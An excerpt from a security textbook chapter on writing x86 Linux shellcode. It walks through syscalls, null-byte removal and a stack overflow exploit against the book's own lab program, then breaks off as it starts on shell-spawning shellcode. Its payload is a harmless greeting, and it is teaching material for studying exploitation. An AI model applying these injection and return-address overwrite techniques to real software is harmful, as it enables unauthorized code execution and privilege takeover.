SHELLCODE - Hacking: The Art of Exploitation (2008)

Chapter 0x500. SHELLCODE

So far, the shellcode used in our exploits has been just a string of copied and pasted bytes. We have seen standard shell-spawning shellcode for local exploits and port-binding shellcode for remote ones. Shellcode is also sometimes referred to as an exploit payload, since these self-contained programs do the real work once a program has been hacked. Shellcode usually spawns a shell, as that is an elegant way to hand off control; but it can do anything a program can do.

Unfortunately, for many hackers the shellcode story stops at copying and pasting bytes. These hackers are just scratching the surface of what's possible. Custom shellcode gives you absolute control over the exploited program. Perhaps you want your shellcode to add an admin account to /etc/passwd or to automatically remove lines from log files. Once you know how to write your own shellcode, your exploits are limited only by your imagination. In addition, writing shellcode develops assembly language skills and employs a number of hacking techniques worth knowing.

Assembly vs. C

The shellcode bytes are actually architecture-specific machine instructions, so shellcode is written in assembly language. Writing a program in assembly is different from writing it in C, but many of the principles are similar. The operating system manages things like input, output, process control, file access, and network communication in the kernel. Compiled C programs ultimately perform these tasks by making system calls to the kernel. Different operating systems have different sets of system calls.

In C, standard libraries are used for convenience and portability. A C program that uses printf() to output a string can be compiled for many different systems, since the library knows the appropriate system calls for various architectures. A C program compiled on an x86 processor will produce x86 assembly language.

By definition, assembly language is already specific to a certain processor architecture, so portability is impossible. There are no standard libraries; instead, kernel system calls have to be made directly. To begin our comparison, let's write a simple C program, then rewrite it in x86 assembly.

helloworld.c

#include <stdio.h>

int main() {

printf("Hello, world!\n");

return 0;

}

When the compiled program is run, execution flows through the standard I/O library, eventually making a system call to write the string Hello, world! to the screen. The strace program is used to trace a program's system calls. Used on the compiled helloworld program, it shows every system call that program makes.

reader@hacking:~/booksrc $ gcc helloworld.c

reader@hacking:~/booksrc $ strace ./a.out

execve("./a.out", ["./a.out"], [/* 27 vars */]) = 0

brk(0) = 0x804a000

access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000

access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

open("/etc/ld.so.cache", O_RDONLY) = 3

fstat64(3, {st_mode=S_IFREG|0644, st_size=61323, ...}) = 0

mmap2(NULL, 61323, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ee7000

close(3) = 0

access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3

read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20Z\1\000"..., 512) = 512

fstat64(3, {st_mode=S_IFREG|0755, st_size=1248904, ...}) = 0

mmap2(NULL, 1258876, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7db3000

mmap2(0xb7ee0000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12c) = 0xb7ee0000

mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee4000

close(3) = 0

mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000

set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

mprotect(0xb7ee0000, 8192, PROT_READ) = 0

munmap(0xb7ee7000, 61323) = 0

fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0

mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef5000

write(1, "Hello, world!\n", 13Hello, world!

) = 13

exit_group(0) = ?

Process 11528 detached

reader@hacking:~/booksrc $

As you can see, the compiled program does more than just print a string. The system calls at the start are setting up the environment and memory for the program, but the important part is the write() syscall near the end of the trace. This is what actually outputs the string.

The Unix manual pages (accessed with the man command) are separated into sections. Section 2 contains the manual pages for system calls, so man 2 write will describe the use of the write() system call:

Man Page for the write() System Call

WRITE(2) Linux Programmer's Manual WRITE(2)

NAME

write - write to a file descriptor

SYNOPSIS

#include <unistd.h>

ssize_t write(int fd, const void *buf, size_t count);

DESCRIPTION

write() writes up to count bytes to the file referenced by the file

descriptor fd from the buffer starting at buf. POSIX requires that a

read() which can be proved to occur after a write() returns the new

data. Note that not all file systems are POSIX conforming.

The strace output also shows the arguments for the syscall. The buf and count arguments are a pointer to our string and its length. The fd argument of 1 is a special standard file descriptor. File descriptors are used for almost everything in Unix: input, output, file access, network sockets, and so on. A file descriptor is similar to a number given out at a coat check. Opening a file descriptor is like checking in your coat, since you are given a number that can later be used to reference your coat. The first three file descriptor numbers (0, 1, and 2) are automatically used for standard input, output, and error. These values are standard and have been defined in several places, such as the /usr/include/unistd.h file shown below.

From /usr/include/unistd.h

/* Standard file descriptors. */

#define STDIN_FILENO 0 /* Standard input. */

#define STDOUT_FILENO 1 /* Standard output. */

#define STDERR_FILENO 2 /* Standard error output. */

Writing bytes to standard output's file descriptor of 1 will print the bytes; reading from standard input's file descriptor of 0 will input bytes. The standard error file descriptor of 2 is used to display the error or debugging messages that can be filtered from the standard output.
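As a minimal sketch of the descriptor numbers in action, the following C fragment calls write() directly on whichever descriptor it is given. The helper name emit() is hypothetical and introduced only for illustration; STDOUT_FILENO and STDERR_FILENO are the constants from unistd.h shown above.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

/* Write a null-terminated string to the given file descriptor.
 * Returns the number of bytes written, or -1 on error.
 * emit() is a hypothetical helper name, not part of any library. */
ssize_t emit(int fd, const char *text) {
    assert(text != NULL);
    return write(fd, text, strlen(text));
}
```

Calling emit(STDOUT_FILENO, "Hello, world!\n") should report 14 bytes written (13 characters plus the newline), while the same call with STDERR_FILENO sends the text to the error stream, where it can be redirected separately.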

Linux System Calls in Assembly

Every possible Linux system call is enumerated, so they can be referenced by numbers when making the calls in assembly. These syscalls are listed in /usr/include/asm-i386/unistd.h.

From /usr/include/asm-i386/unistd.h

#ifndef _ASM_I386_UNISTD_H_

#define _ASM_I386_UNISTD_H_

/*

* This file contains the system call numbers.

*/

#define __NR_restart_syscall 0

#define __NR_exit 1

#define __NR_fork 2

#define __NR_read 3

#define __NR_write 4

#define __NR_open 5

#define __NR_close 6

#define __NR_waitpid 7

#define __NR_creat 8

#define __NR_link 9

#define __NR_unlink 10

#define __NR_execve 11

#define __NR_chdir 12

#define __NR_time 13

#define __NR_mknod 14

#define __NR_chmod 15

#define __NR_lchown 16

#define __NR_break 17

#define __NR_oldstat 18

#define __NR_lseek 19

#define __NR_getpid 20

#define __NR_mount 21

#define __NR_umount 22

#define __NR_setuid 23

#define __NR_getuid 24

#define __NR_stime 25

#define __NR_ptrace 26

#define __NR_alarm 27

#define __NR_oldfstat 28

#define __NR_pause 29

#define __NR_utime 30

#define __NR_stty 31

#define __NR_gtty 32

#define __NR_access 33

#define __NR_nice 34

#define __NR_ftime 35

#define __NR_sync 36

#define __NR_kill 37

#define __NR_rename 38

#define __NR_mkdir 39

...

For our rewrite of helloworld.c in assembly, we will make a system call to the write() function for the output and then a second system call to exit() so the process quits cleanly. This can be done in x86 assembly using just two assembly instructions: mov and int.

Assembly instructions for the x86 processor have one, two, three, or no operands. The operands to an instruction can be numerical values, memory addresses, or processor registers. The x86 processor has several 32-bit registers that can be viewed as hardware variables. The registers EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP can all be used as operands, while the EIP register (instruction pointer) cannot.

The mov instruction copies a value between its two operands. Using Intel assembly syntax, the first operand is the destination and the second is the source. The int instruction sends an interrupt signal to the kernel, defined by its single operand. With the Linux kernel, interrupt 0x80 is used to tell the kernel to make a system call. When the int 0x80 instruction is executed, the kernel will make a system call based on the first four registers. The EAX register is used to specify which system call to make, while the EBX, ECX, and EDX registers are used to hold the first, second, and third arguments to the system call. All of these registers can be set using the mov instruction.
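The idea of selecting a system call by number can also be tried from C before moving to assembly. The sketch below assumes a Linux system whose C library provides the syscall() function; raw_write() is a hypothetical helper name. The first argument plays the role of EAX, and the remaining three correspond to EBX, ECX, and EDX. The numeric value of SYS_write depends on the architecture the code is compiled for: it is 4 on 32-bit x86, matching __NR_write above, but differs elsewhere.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Invoke write by system call number rather than through the write()
 * wrapper. raw_write() is a hypothetical helper name.
 * Returns the byte count, or -1 on error (errno is set by syscall()). */
long raw_write(int fd, const void *buf, unsigned long count) {
    assert(buf != NULL);
    return syscall(SYS_write, fd, buf, count);
}
```

For example, raw_write(1, "Hello, world!\n", 14) asks the kernel for the same operation that the assembly listing requests with int 0x80.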

In the following assembly code listing, the memory segments are simply declared. The string "Hello, world!" with a newline character (0x0a) is in the data segment, and the actual assembly instructions are in the text segment. This follows proper memory segmentation practices.

helloworld.asm

section .data ; Data segment

msg db "Hello, world!", 0x0a ; The string and newline char

section .text ; Text segment

global _start ; Default entry point for ELF linking

_start:

; SYSCALL: write(1, msg, 14)

mov eax, 4 ; Put 4 into eax, since write is syscall #4.

mov ebx, 1 ; Put 1 into ebx, since stdout is 1.

mov ecx, msg ; Put the address of the string into ecx.

mov edx, 14 ; Put 14 into edx, since our string is 14 bytes.

int 0x80 ; Call the kernel to make the system call happen.

; SYSCALL: exit(0)

mov eax, 1 ; Put 1 into eax, since exit is syscall #1.

mov ebx, 0 ; Exit with success.

int 0x80 ; Do the syscall.

The instructions of this program are straightforward. For the write() syscall to standard output, the value of 4 is put in EAX since the write() function is system call number 4. Then, the value of 1 is put into EBX, since the first argument of write() should be the file descriptor for standard output. Next, the address of the string in the data segment is put into ECX, and the length of the string (in this case, 14 bytes) is put into EDX. After these registers are loaded, the system call interrupt is triggered, which will call the write() function.

To exit cleanly, the exit() function needs to be called with a single argument of 0. So the value of 1 is put into EAX, since exit() is system call number 1, and the value of 0 is put into EBX, since the first and only argument should be 0. Then the system call interrupt is triggered again.

To create an executable binary, this assembly code must first be assembled and then linked into an executable format. When compiling C code, the GCC compiler takes care of all of this automatically. We are going to create an Executable and Linkable Format (ELF) binary, so the global _start line shows the linker where the assembly instructions begin.

The nasm assembler with the -f elf argument will assemble the helloworld.asm into an object file ready to be linked as an ELF binary. By default, this object file will be called helloworld.o. The linker program ld will produce an executable a.out binary from the assembled object.

reader@hacking:~/booksrc $ nasm -f elf helloworld.asm

reader@hacking:~/booksrc $ ld helloworld.o

reader@hacking:~/booksrc $ ./a.out

Hello, world!

reader@hacking:~/booksrc $

This tiny program works, but it's not shellcode, since it isn't self-contained and must be linked.

The Path to Shellcode

Shellcode is literally injected into a running program, where it takes over like a biological virus inside a cell. Since shellcode isn't really an executable program, we don't have the luxury of declaring the layout of data in memory or even using other memory segments. Our instructions must be self-contained and ready to take over control of the processor regardless of its current state. This is commonly referred to as position-independent code.

In shellcode, the bytes for the string "Hello, world!" must be mixed together with the bytes for the assembly instructions, since there aren't definable or predictable memory segments. This is fine as long as EIP doesn't try to interpret the string as instructions. However, to access the string as data we need a pointer to it. When the shellcode gets executed, it could be anywhere in memory. The string's absolute memory address needs to be calculated relative to EIP. Since EIP cannot be accessed from assembly instructions, however, we need to use some sort of trick.

Assembly Instructions Using the Stack

The stack is so integral to the x86 architecture that there are special instructions for its operations.

Instruction

Description

push <source>

Push the source operand to the stack.

pop <destination>

Pop a value from the stack and store in the destination operand.

call <location>

Call a function, jumping the execution to the address in the location operand. This location can be relative or absolute. The address of the instruction following the call is pushed to the stack, so that execution can return later.

ret

Return from a function, popping the return address from the stack and jumping execution there.

Stack-based exploits are made possible by the call and ret instructions. When a function is called, the return address of the next instruction is pushed to the stack, beginning the stack frame. After the function is finished, the ret instruction pops the return address from the stack and jumps EIP back there. By overwriting the stored return address on the stack before the ret instruction, we can take control of a program's execution.

This architecture can be misused in another way to solve the problem of addressing the inline string data. If the string is placed directly after a call instruction, the address of the string will get pushed to the stack as the return address. Instead of calling a function, we can jump past the string to a pop instruction that will take the address off the stack and into a register. The following assembly instructions demonstrate this technique.

helloworld1.s

BITS 32 ; Tell nasm this is 32-bit code.

call mark_below ; Call below the string to instructions

db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.

mark_below:

; ssize_t write(int fd, const void *buf, size_t count);

pop ecx ; Pop the return address (string ptr) into ecx.

mov eax, 4 ; Write syscall #.

mov ebx, 1 ; STDOUT file descriptor

mov edx, 15 ; Length of the string

int 0x80 ; Do syscall: write(1, string, 15)

; void _exit(int status);

mov eax, 1 ; Exit syscall #

mov ebx, 0 ; Status = 0

int 0x80 ; Do syscall: exit(0)

The call instruction jumps execution down below the string. This also pushes the address of the next instruction to the stack, the next instruction in our case being the beginning of the string. The return address can immediately be popped from the stack into the appropriate register. Without using any memory segments, these raw instructions, injected into an existing process, will execute in a completely position-independent way. This means that, when these instructions are assembled, they cannot be linked into an executable.

reader@hacking:~/booksrc $ nasm helloworld1.s

reader@hacking:~/booksrc $ ls -l helloworld1

-rw-r--r-- 1 reader reader 50 2007-10-26 08:30 helloworld1

reader@hacking:~/booksrc $ hexdump -C helloworld1

00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c |.....Hello, worl|

00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01 00 00 00 ba |d!..Y...........|

00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |................|

00000030 cd 80 |..|

00000032

reader@hacking:~/booksrc $ ndisasm -b32 helloworld1

00000000 E80F000000 call 0x14

00000005 48 dec eax

00000006 656C gs insb

00000008 6C insb

00000009 6F outsd

0000000A 2C20 sub al,0x20

0000000C 776F ja 0x7d

0000000E 726C jc 0x7c

00000010 64210A and [fs:edx],ecx

00000013 0D59B80400 or eax,0x4b859

00000018 0000 add [eax],al

0000001A BB01000000 mov ebx,0x1

0000001F BA0F000000 mov edx,0xf

00000024 CD80 int 0x80

00000026 B801000000 mov eax,0x1

0000002B BB00000000 mov ebx,0x0

00000030 CD80 int 0x80

reader@hacking:~/booksrc $

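The nasm assembler converts assembly language into machine code and a corresponding tool called ndisasm converts machine code into assembly. These tools are used above to show the relationship between the machine code bytes and the assembly instructions. The disassembled instructions from offset 0x05 through 0x13 (set in bold in the printed listing) are the bytes of the "Hello, world!" string interpreted as instructions. The last of these, which begins with the 0x0d byte at offset 0x13, also swallows the bytes of the pop ecx and mov eax instructions that follow the string, which is why those two instructions do not appear in the disassembly.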

Now, if we can inject this shellcode into a program and redirect EIP, the program will print out Hello, world! Let's use the familiar exploit target of the notesearch program.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9c6

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')

-------[ end of note data ]-------

Segmentation fault

reader@hacking:~/booksrc $

Failure. Why do you think it crashed? In situations like this, GDB is your best friend. Even if you already know the reason behind this specific crash, learning how to effectively use a debugger will help you solve many other problems in the future.

Investigating with GDB

Since the notesearch program runs as root, we can't debug it as a normal user. However, we also can't just attach to a running copy of it, because it exits too quickly. Another way to debug programs is with core dumps. From a root prompt, the OS can be told to dump memory when the program crashes by using the command ulimit -c unlimited. This means that dumped core files are allowed to get as big as needed. Now, when the program crashes, the memory will be dumped to disk as a core file, which can be examined using GDB.

reader@hacking:~/booksrc $ sudo su

root@hacking:/home/reader/booksrc # ulimit -c unlimited

root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)

root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9a3

root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\xff\xbf"x40')

-------[ end of note data ]-------

Segmentation fault (core dumped)

root@hacking:/home/reader/booksrc # ls -l ./core

-rw------- 1 root root 147456 2007-10-26 08:36 ./core

root@hacking:/home/reader/booksrc # gdb -q -c ./core

(no debugging symbols found)

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

Core was generated by './notesearch

£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.

Program terminated with signal 11, Segmentation fault.

#0 0x2c6541b7 in ?? ()

(gdb) set dis intel

(gdb) x/5i 0xbffff9a3

0xbffff9a3: call 0x2c6541b7

0xbffff9a8: ins BYTE PTR es:[edi],[dx]

0xbffff9a9: outs [dx],DWORD PTR ds:[esi]

0xbffff9aa: sub al,0x20

0xbffff9ac: ja 0xbffffa1d

(gdb) i r eip

eip 0x2c6541b7 0x2c6541b7

(gdb) x/32xb 0xbffff9a3

0xbffff9a3: 0xe8 0x0f 0x48 0x65 0x6c 0x6c 0x6f 0x2c

0xbffff9ab: 0x20 0x77 0x6f 0x72 0x6c 0x64 0x21 0x0a

0xbffff9b3: 0x0d 0x59 0xb8 0x04 0xbb 0x01 0xba 0x0f

0xbffff9bb: 0xcd 0x80 0xb8 0x01 0xbb 0xcd 0x80 0x00

(gdb) quit

root@hacking:/home/reader/booksrc # hexdump -C helloworld1

00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c |.....Hello, worl|

00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01 00 00 00 ba |d!..Y...........|

00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |................|

00000030 cd 80 |..|

00000032

root@hacking:/home/reader/booksrc #

Once GDB is loaded, the disassembly style is switched to Intel. Since we are running GDB as root, the .gdbinit file won't be used. The memory where the shellcode should be is examined. The instructions look incorrect, but it seems like the first incorrect call instruction is what caused the crash. At least, execution was redirected, but something went wrong with the shellcode bytes. Normally, strings are terminated by a null byte, but here, the shell was kind enough to remove these null bytes for us. This, however, totally destroys the meaning of the machine code. Often, shellcode will be injected into a process as a string, using functions like strcpy(). Such functions will simply terminate at the first null byte, producing incomplete and unusable shellcode in memory. In order for the shellcode to survive transit, it must be redesigned so it doesn't contain any null bytes.
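The effect of a string-style copy on this shellcode can be estimated with a short C sketch. It assumes a copy routine that stops at the first null byte, as strcpy() does; the helper names first_null() and bytes_surviving_copy() are hypothetical, and the sample bytes are the first eight bytes of helloworld1 taken from the hexdump above.

```c
#include <assert.h>
#include <stddef.h>

/* First 8 bytes of helloworld1, copied from the hexdump above. */
static const unsigned char helloworld1_head[] = {
    0xe8, 0x0f, 0x00, 0x00, 0x00, 0x48, 0x65, 0x6c
};

/* Return the offset of the first null byte in buf, or -1 if there is none.
 * first_null() is a hypothetical helper name. */
long first_null(const unsigned char *buf, size_t len) {
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00) {
            return (long)i;
        }
    }
    return -1;
}

/* Number of bytes a strcpy()-style copy would carry over: everything up
 * to, but not including, the first null byte. Falls back to len when the
 * buffer contains no null byte at all. */
size_t bytes_surviving_copy(const unsigned char *buf, size_t len) {
    long pos = first_null(buf, len);
    return pos < 0 ? len : (size_t)pos;
}
```

For helloworld1, the first null byte sits at offset 2, inside the operand of the call instruction, so only the bytes e8 0f would survive such a copy.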

Removing Null Bytes

Looking at the disassembly, it is obvious that the first null bytes come from the call instruction.

reader@hacking:~/booksrc $ ndisasm -b32 helloworld1

00000000 E80F000000 call 0x14

00000005 48 dec eax

00000006 656C gs insb

00000008 6C insb

00000009 6F outsd

0000000A 2C20 sub al,0x20

0000000C 776F ja 0x7d

0000000E 726C jc 0x7c

00000010 64210A and [fs:edx],ecx

00000013 0D59B80400 or eax,0x4b859

00000018 0000 add [eax],al

0000001A BB01000000 mov ebx,0x1

0000001F BA0F000000 mov edx,0xf

00000024 CD80 int 0x80

00000026 B801000000 mov eax,0x1

0000002B BB00000000 mov ebx,0x0

00000030 CD80 int 0x80

reader@hacking:~/booksrc $

This instruction jumps execution forward by 15 (0x0f) bytes, measured from the end of the call instruction, based on its operand. The call instruction allows for much longer jump distances, which means that a small value like 15 will have to be padded with leading zeros, resulting in null bytes.

One way around this problem takes advantage of two's complement. A small negative number will have its leading bits turned on, resulting in 0xff bytes. This means that, if we call using a negative value to move backward in execution, the machine code for that instruction won't have any null bytes. The following revision of the helloworld shellcode uses a standard implementation of this trick: Jump to the end of the shellcode to a call instruction which, in turn, will jump back to a pop instruction at the beginning of the shellcode.

helloworld2.s

BITS 32 ; Tell nasm this is 32-bit code.

jmp short one ; Jump down to a call at the end.

two:

; ssize_t write(int fd, const void *buf, size_t count);

pop ecx ; Pop the return address (string ptr) into ecx.

mov eax, 4 ; Write syscall #.

mov ebx, 1 ; STDOUT file descriptor

mov edx, 15 ; Length of the string

int 0x80 ; Do syscall: write(1, string, 15)

; void _exit(int status);

mov eax, 1 ; Exit syscall #

mov ebx, 0 ; Status = 0

int 0x80 ; Do syscall: exit(0)

one:

call two ; Call back upwards to avoid null bytes

db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.

After assembling this new shellcode, disassembly shows that the call instruction (at offset 0x20 below) is now free of null bytes. This solves the first and most difficult null-byte problem for this shellcode, but there are still many other null bytes in the operands of the mov instructions.

reader@hacking:~/booksrc $ nasm helloworld2.s

reader@hacking:~/booksrc $ ndisasm -b32 helloworld2

00000000 EB1E jmp short 0x20

00000002 59 pop ecx

00000003 B804000000 mov eax,0x4

00000008 BB01000000 mov ebx,0x1

0000000D BA0F000000 mov edx,0xf

00000012 CD80 int 0x80

00000014 B801000000 mov eax,0x1

00000019 BB00000000 mov ebx,0x0

0000001E CD80 int 0x80

00000020 E8DDFFFFFF call 0x2

00000025 48 dec eax

00000026 656C gs insb

00000028 6C insb

00000029 6F outsd

0000002A 2C20 sub al,0x20

0000002C 776F ja 0x9d

0000002E 726C jc 0x9c

00000030 64210A and [fs:edx],ecx

00000033 0D db 0x0D

reader@hacking:~/booksrc $

These remaining null bytes can be eliminated with an understanding of register widths and addressing. Notice that the first jmp instruction is actually jmp short. This means execution can only jump a maximum of approximately 128 bytes in either direction. The normal jmp instruction, as well as the call instruction (which has no short version), allows for much longer jumps. The difference between assembled machine code for the two jump varieties is shown below:

EB 1E jmp short 0x20

versus

E9 1E 00 00 00 jmp 0x23

The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits in width. The E stands for extended, because these were originally 16-bit registers called AX, BX, CX, DX, SI, DI, BP, and SP. These original 16-bit versions of the registers can still be used for accessing the first 16 bits of each corresponding 32-bit register. Furthermore, the individual bytes of the AX, BX, CX, and DX registers can be accessed as 8-bit registers called AL, AH, BL, BH, CL, CH, DL, and DH, where L stands for low byte and H for high byte. Naturally, assembly instructions using the smaller registers only need to specify operands up to the register's bit width. The three variations of a mov instruction are shown below.

Machine code      Assembly

B8 04 00 00 00    mov eax,0x4

66 B8 04 00       mov ax,0x4

B0 04             mov al,0x4

Using the AL, BL, CL, or DL register will put the correct least significant byte into the corresponding extended register without creating any null bytes in the machine code. However, the top three bytes of the register could still contain anything. This is especially true for shellcode, since it will be taking over another process. If we want the 32-bit register values to be correct, we need to zero out the entire register before the mov instructions—but this, again, must be done without using null bytes. Here are some more simple assembly instructions for your arsenal. These first two are small instructions that increment and decrement their operand by one.

Instruction

Description

inc <target>

Increment the target operand by adding 1 to it.

dec <target>

Decrement the target operand by subtracting 1 from it.

The next few instructions, like the mov instruction, have two operands. They all do simple arithmetic and bitwise logical operations between the two operands, storing the result in the first operand.

Instruction

Description

add <dest>, <source>

Add the source operand to the destination operand, storing the result in the destination.

sub <dest>, <source>

Subtract the source operand from the destination operand, storing the result in the destination.

or <dest>, <source>

Perform a bitwise or logic operation, comparing each bit of one operand with the corresponding bit of the other operand.

1 or 0 = 1

1 or 1 = 1

0 or 1 = 1

0 or 0 = 0

If the source bit or the destination bit is on, or if both of them are on, the result bit is on; otherwise, the result is off. The final result is stored in the destination operand.

and <dest>, <source>

Perform a bitwise and logic operation, comparing each bit of one operand with the corresponding bit of the other operand.

1 and 0 = 0

1 and 1 = 1

0 and 1 = 0

0 and 0 = 0

The result bit is on only if both the source bit and the destination bit are on. The final result is stored in the destination operand.

xor <dest>, <source>

Perform a bitwise exclusive or (xor) logical operation, comparing each bit of one operand with the corresponding bit of the other operand.

1 xor 0 = 1

1 xor 1 = 0

0 xor 1 = 1

0 xor 0 = 0

If the bits differ, the result bit is on; if the bits are the same, the result bit is off. The final result is stored in the destination operand.

One way to zero a register is to move an arbitrary 32-bit number into the register and then subtract that value from the register using the mov and sub instructions:

B8 44 33 22 11 mov eax,0x11223344

2D 44 33 22 11 sub eax,0x11223344

While this technique works, it takes 10 bytes to zero out a single register, making the assembled shellcode larger than necessary. Can you think of a way to optimize this technique? The DWORD value specified in each instruction comprises 80 percent of the code. Subtracting any value from itself also produces 0 and doesn't require any static data. This can be done with a single two-byte instruction:

29 C0 sub eax,eax

Using the sub instruction will work fine when zeroing registers at the beginning of shellcode. This instruction will modify processor flags, which are used for branching, however. There is another two-byte instruction that is used to zero registers in most shellcode. The xor instruction performs an exclusive or operation on the bits in a register. Since 1 xored with 1 results in a 0, and 0 xored with 0 results in a 0, any value xored with itself will result in 0. This is the same result as with any value subtracted from itself. Like sub, the xor instruction also updates processor flags, so neither should be placed between a comparison and the branch that depends on it; xor is simply the idiom most shellcode authors reach for.

31 C0 xor eax,eax
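The interaction between zeroing a register and writing only its low byte can be modeled in plain C. This is only an arithmetic model of the register contents, not real register access; the function names mov_al(), xor_self(), and load_small() are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Model of `mov al, imm8`: only the low byte of the 32-bit register
 * changes; the upper three bytes keep whatever they held before. */
uint32_t mov_al(uint32_t eax, uint8_t imm8) {
    return (eax & 0xffffff00u) | imm8;
}

/* Model of `xor reg, reg`: any value xored with itself is 0. */
uint32_t xor_self(uint32_t reg) {
    return reg ^ reg;
}

/* Model of the two-instruction idiom `xor eax, eax` then `mov al, imm8`. */
uint32_t load_small(uint32_t stale_eax, uint8_t imm8) {
    uint32_t eax = mov_al(xor_self(stale_eax), imm8);
    assert(eax == imm8);  /* the upper three bytes are guaranteed clear */
    return eax;
}
```

Starting from a stale value such as 0xdeadbeef, mov_al() alone leaves 0xdeadbe04 in the register, which is not a valid system call number, whereas load_small() yields exactly 4.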

You can safely use the sub instruction to zero registers (if done at the beginning of the shellcode), but the xor instruction is most commonly used in shellcode in the wild. This next revision of the shellcode makes use of the smaller registers and the xor instruction to avoid null bytes. The inc and dec instructions have also been used when possible to make for even smaller shellcode.

helloworld3.s

BITS 32 ; Tell nasm this is 32-bit code.

jmp short one ; Jump down to a call at the end.

two:

; ssize_t write(int fd, const void *buf, size_t count);

pop ecx ; Pop the return address (string ptr) into ecx.

xor eax, eax ; Zero out full 32 bits of eax register.

mov al, 4 ; Write syscall #4 to the low byte of eax.

xor ebx, ebx ; Zero out ebx.

inc ebx ; Increment ebx to 1, STDOUT file descriptor.

xor edx, edx

mov dl, 15 ; Length of the string

int 0x80 ; Do syscall: write(1, string, 15)

; void _exit(int status);

mov al, 1 ; Exit syscall #1, the top 3 bytes are still zeroed.

dec ebx ; Decrement ebx back down to 0 for status = 0.

int 0x80 ; Do syscall: exit(0)

one:

call two ; Call back upwards to avoid null bytes

db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.

After assembling this shellcode, hexdump and grep are used to quickly check it for null bytes.

reader@hacking:~/booksrc $ nasm helloworld3.s

reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00

00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 0f cd 80 |..Y1...1.C1.....|

00000010 b0 01 4b cd 80 e8 e8 ff ff ff 48 65 6c 6c 6f 2c |..K.......Hello,|

00000020 20 77 6f 72 6c 64 21 0a 0d | world!..|

00000029

reader@hacking:~/booksrc $

Now this shellcode is usable, as it doesn't contain any null bytes. When used with an exploit, the notesearch program is coerced into greeting the world like a newbie.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9bc

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

Hello, world!

reader@hacking:~/booksrc $

Shell-Spawning Shellcode

Now that you've learned how to make system calls and avoid null bytes, all sorts of shellcodes can be constructed. To spawn a shell, we just need to make a system call to execute the /bin/sh shell program. System call number 11, execve(), is similar to the C exec-family functions (such as execl()) that we used in the previous chapters.

EXECVE(2) Linux Programmer's Manual EXECVE(2)

NAME

execve - execute program

SYNOPSIS

#include <unistd.h>

int execve(const char *filename, char *const argv[],

char *const envp[]);

DESCRIPTION

execve() executes the program pointed to by filename. Filename must be

either a binary executable, or a script starting with a line of the

form "#! interpreter [arg]". In the latter case, the interpreter must

be a valid pathname for an executable which is not itself a script,

which will be invoked as interpreter [arg] filename.

argv is an array of argument strings passed to the new program. envp

is an array of strings, conventionally of the form key=value, which are

passed as environment to the new program. Both argv and envp must be

terminated by a null pointer. The argument vector and environment can

be accessed by the called program's main function, when it is defined

as int main(int argc, char *argv[], char *envp[]).

The first argument, the filename, should be a pointer to the string "/bin/sh", since this is what we want to execute. The environment array (the third argument) can be empty, but it still needs to be terminated with a 32-bit null pointer. The argument array (the second argument) must be null-terminated, too; it must also contain the string pointer, since the zeroth argument is the name of the running program. Done in C, a program making this call would look like this:

exec_shell.c

#include <unistd.h>

int main() {

